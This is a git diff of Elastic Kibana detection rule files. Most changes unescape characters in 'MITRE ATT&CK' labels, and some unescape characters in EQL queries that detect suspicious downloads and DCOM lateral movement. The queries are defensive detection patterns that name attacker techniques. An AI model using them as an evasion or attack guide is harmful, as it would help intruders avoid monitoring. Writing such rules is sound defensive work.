a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_6.json +++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_6.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_7.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_7.json index bac5d22abb2..4ab719ef2cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_7.json +++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_7.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_8.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_8.json index bf064d1f117..5904e6bee99 100644 --- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_8.json +++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_8.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_9.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_9.json index b24790f3733..6036ce6ac5f 100644 --- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_9.json +++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_9.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_1.json b/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_1.json index f7fb64945db..c86522bf1f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_1.json +++ b/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "File with Suspicious Extension Downloaded", - "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.extension : (\n \"appinstaller\", \"application\", \"appx\", \"appxbundle\", \"cpl\", \"diagcab\", \"diagpkg\", \"diagcfg\", \"manifest\",\n \"msix\", \"pif\", \"search-ms\", \"searchConnector-ms\", \"settingcontent-ms\", \"symlink\", \"theme\", \"themepack\" \n ) and file.Ext.windows.zone_identifier \u003e 1 and\n not\n (\n file.extension : \"msix\" and file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\Microsoft.Winget.Source*\"\n )\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.extension : (\n \"appinstaller\", \"application\", \"appx\", \"appxbundle\", \"cpl\", \"diagcab\", \"diagpkg\", \"diagcfg\", \"manifest\",\n \"msix\", \"pif\", \"search-ms\", \"searchConnector-ms\", \"settingcontent-ms\", \"symlink\", \"theme\", \"themepack\" \n ) and file.Ext.windows.zone_identifier > 1 and\n not\n (\n file.extension : \"msix\" and file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\Microsoft.Winget.Source*\"\n )\n", "references": [ "https://x.com/Laughing_Mantis/status/1518766501385318406", "https://wikileaks.org/ciav7p1/cms/page_13763375.html" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_1.json b/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_1.json index 33785e91aba..0f7f61b6739 100644 --- a/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_1.json +++ b/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_1.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_2.json b/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_2.json index 6bb4e586ee5..5413e6fec8a 100644 --- a/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_2.json +++ b/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_2.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_103.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_103.json index 667fe199fbf..5438baba0bd 100644 --- a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_103.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -63,7 +63,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_104.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_104.json index 452af282846..355097ee4f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_104.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -63,7 +63,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_105.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_105.json index 72dad2b7f9c..ef3259396b1 100644 --- a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_105.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -64,7 +64,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_106.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_106.json index 411185ec62e..4cb64f6ceb4 100644 --- a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_106.json +++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_106.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -65,7 +65,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_107.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_107.json index a4d3d3e626b..ec9bfe1ebc0 100644 --- a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_107.json +++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_107.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -65,7 +65,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_101.json b/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_101.json index 362cc692a66..9bee654282e 100644 --- a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_101.json +++ b/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_101.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_102.json b/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_102.json index 24d78ae2b32..6a024ef3bca 100644 --- a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_1.json b/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_1.json index f41bcb7d209..0215051a03b 100644 --- a/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_1.json +++ b/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/8eec4df1-4b4b-4502-b6c3-c788714604c9_1.json b/packages/security_detection_engine/kibana/security_rule/8eec4df1-4b4b-4502-b6c3-c788714604c9_1.json index d3555eb3a48..9a38e042c2b 100644 --- a/packages/security_detection_engine/kibana/security_rule/8eec4df1-4b4b-4502-b6c3-c788714604c9_1.json +++ b/packages/security_detection_engine/kibana/security_rule/8eec4df1-4b4b-4502-b6c3-c788714604c9_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_102.json b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_102.json index aab0eeb6386..1c9792c5e05 100644 --- a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_102.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_103.json b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_103.json index 03543c12cc7..1ae876f5760 100644 --- a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_104.json b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_104.json index 305f3007a82..04c22ac3f8c 100644 --- a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_105.json b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_105.json index 198dcb83e54..c8bdad44f5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_103.json b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_103.json index f6c29a14a60..e0d606f6c3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_103.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows", - "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" ], @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_104.json b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_104.json index 6a658e3bedd..3473b8eccfa 100644 --- a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows", - "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" ], @@ -100,7 +100,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_105.json b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_105.json index 64600f338bd..6346d221661 100644 --- a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows", - "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" ], @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_103.json b/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_103.json index e7112e934b6..4edcb173181 100644 --- a/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_104.json b/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_104.json index fbe04cb6073..bfd3e5b8b3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_103.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_103.json index a0dfe35b7e1..349809fa28b 100644 --- a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_103.json +++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_104.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_104.json index e7b17da7f9f..13e2bf18be8 100644 --- a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_104.json +++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_104.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_105.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_105.json index 5196562b968..e235017e2bd 100644 --- a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_105.json +++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_106.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_106.json index 7c980aa7b1c..20340513736 100644 --- a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_106.json +++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_106.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_107.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_107.json index 92b95b2cd2d..55f856cbd86 100644 --- a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_107.json +++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_107.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_102.json b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_102.json index 2df5df89acf..e7e1f4be826 100644 --- a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_102.json +++ b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_102.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_103.json b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_103.json index 78b9ba6f150..86aa1f98019 100644 --- a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_103.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_104.json b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_104.json index a141ece0490..272b3ab4ed0 100644 --- a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_104.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_205.json b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_205.json index 3a4effe15c8..d92c756366f 100644 --- a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_205.json +++ b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_205.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_102.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_102.json index dbad5d9f680..1e96570972f 100644 --- a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_102.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE 